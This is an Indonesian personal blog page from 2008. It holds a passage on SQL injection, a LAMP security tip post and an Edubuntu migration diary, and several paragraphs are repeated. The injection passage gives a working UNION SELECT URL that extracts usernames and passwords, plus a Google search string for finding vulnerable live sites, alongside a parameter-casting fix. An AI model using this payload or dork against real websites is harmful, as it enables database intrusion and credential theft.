dan ruginya kalo version 5,,wuihh haha
untuk sql injection step by step
silahkan liat di milw0rm
ato di mbah google
eh di echo juga ada
ini salah satu links gw yg gw coba di localhost
http://localhost/news.php?recordID=-1 union all select 1,2,version(),user(),database(),concat_ws(username,0x3a,password),7,8 from user--
Ini hanyalah sebuah penelitian
dan gw coba cari di google dgn keyword:
inurl:.php?recordID=
ternyata hasilnya banyak juga
dan carilah yg versi 5 yiahh,,hehe
Dan untuk anda yg kebetulan belum mempatch
caranya mudah sekali,hihi
uda tau function GetSQLValueString di dreamweaver 8 ?
yah pake aja itu kalo masih tetep nyalain magic quotes nya
contoh script nya
untuk id gunakana type int
$recordID = GetSQLValueString($_GET['recordID'], "int");
okeyzzz
CMIIW
untuk lebih lanjut contact me aja
Thx
juniorsev3n
Selasa, 22 Januari 2008
Linux Apache Mysql Php
LAMP mungkin ini solusi buat para admin dalam sebuah website di indonesia. Karena menurut saya pada dasarnya dalam sebuah website itu memerlukan security, design yang menarik(php menurut saya). sebenernya sekarang masih banyak admin di indonesia yang tidak mementingkan security, hanya ada design yang menarik dan tidak mempedulikan hole pada sebauh websitenya.
LAMP menurut saya konsep yang menarik karena didalamnya terdapat:
-Linux (menurut saya distro apapun,,bisa dipakai);
-Apache (meskipun banyak pesaingnya,,ini yang paling terkenal dan simple);
-Mysql (sebagai menyimpanan database);
-Php (bahasa yang banyak dipakai dan fleksible,,keren lah kalau anda mengerti
banyak ttg script2 php,,bisa dikunjungi di www.php.net
sebenarnya itu semua berbalik ke admin itu sendiri,,
karena pada dasarnya bila admin itu mempatch hole pada websitenya,,
mungkin tidak ada hacking..(meskipun admin memakai SO[w1nd0ws])
Bila anda memakai LAMP janganlah anda memakai user [root] karena anda tahu sendiri kan
bahwa root adalah user tingkat yang paling tinggi di linux.
Percuma bila anda memakai LAMP tetapi anda memakai user root pada website itu,,
tahu sendiri mungkin bahayanya.
Dan mungkin satu saran dari saya jangan memasang perm 777,,alias yang banyak di deface.
Apabila anda memakai web software yang kebanyakan mempunyai hole ,,patch lah hole tersebut..
hehe maap kalo salah
LAMP menurut saya konsep yang menarik karena didalamnya terdapat:
-Linux (menurut saya distro apapun,,bisa dipakai);
-Apache (meskipun banyak pesaingnya,,ini yang paling terkenal dan simple);
-Mysql (sebagai menyimpanan database);
-Php (bahasa yang banyak dipakai dan fleksible,,keren lah kalau anda mengerti
banyak ttg script2 php,,bisa dikunjungi di www.php.net
sebenarnya itu semua berbalik ke admin itu sendiri,,
karena pada dasarnya bila admin itu mempatch hole pada websitenya,,
mungkin tidak ada hacking..(meskipun admin memakai SO[w1nd0ws])
Bila anda memakai LAMP janganlah anda memakai user [root] karena anda tahu sendiri kan
bahwa root adalah user tingkat yang paling tinggi di linux.
Percuma bila anda memakai LAMP tetapi anda memakai user root pada website itu,,
tahu sendiri mungkin bahayanya.
Dan mungkin satu saran dari saya jangan memasang perm 777,,alias yang banyak di deface.
Apabila anda memakai web software yang kebanyakan mempunyai hole ,,patch lah hole tersebut..
hehe maap kalo salah
Rabu, 02 Januari 2008
Migrasi ke edubuntu
Migrasi??
Kata itu yg terlintas..
Soalnya dari dulu ingin pake linux !!! tapi dilarang mulu ama kakak soalnya ga bisaeun trus biasa ama windows (anu bajakan tea!!)..
pertama2 nginstal ini linux sih mayan gampang cuma pusingnya pass ke extended2 gitu..
dengan terpaksa yang saia pastisi itu hardisk meskipun jadi 3 bagian..
dengan lamanya nginstal,, ya udah tinggalin selama 1 jam ke rumah si gilang..(sambil maen)
sedikit informasi aja kalo misalkan kalian2 ga bisa nyimpen boot di hardisknya mendingan kaia saia ..(partisi tuh hardisk)
hahaha
yah, dah selesai menginstal sekarang masuk dehh
yeeee...keren uy bootingnya edubuntu..manteplahh
setelah gitu semua hardware uda pada kedetek tinggal setel musik lurr!!
meskipun ada suaranya dan via audionya uda kedetek tapi masalahnya sekarang mulai internal!!
sekarang masalahnya di mp3 playernya..
dengan sangat terpaksa..harus download dulu yang namanya GStreamer..
Ahh dodolll
padahal kalo online aja ga perlu pusing2 ngedownload tinggal add/remove di systemnya...
Kata itu yg terlintas..
Soalnya dari dulu ingin pake linux !!! tapi dilarang mulu ama kakak soalnya ga bisaeun trus biasa ama windows (anu bajakan tea!!)..
pertama2 nginstal ini linux sih mayan gampang cuma pusingnya pass ke extended2 gitu..
dengan terpaksa yang saia pastisi itu hardisk meskipun jadi 3 bagian..
dengan lamanya nginstal,, ya udah tinggalin selama 1 jam ke rumah si gilang..(sambil maen)
sedikit informasi aja kalo misalkan kalian2 ga bisa nyimpen boot di hardisknya mendingan kaia saia ..(partisi tuh hardisk)
hahaha
yah, dah selesai menginstal sekarang masuk dehh
yeeee...keren uy bootingnya edubuntu..manteplahh
setelah gitu semua hardware uda pada kedetek tinggal setel musik lurr!!
meskipun ada suaranya dan via audionya uda kedetek tapi masalahnya sekarang mulai internal!!
sekarang masalahnya di mp3 playernya..
dengan sangat terpaksa..harus download dulu yang namanya GStreamer..
Ahh dodolll
padahal kalo online aja ga perlu pusing2 ngedownload tinggal add/remove di systemnya...
Langganan:
Postingan (Atom)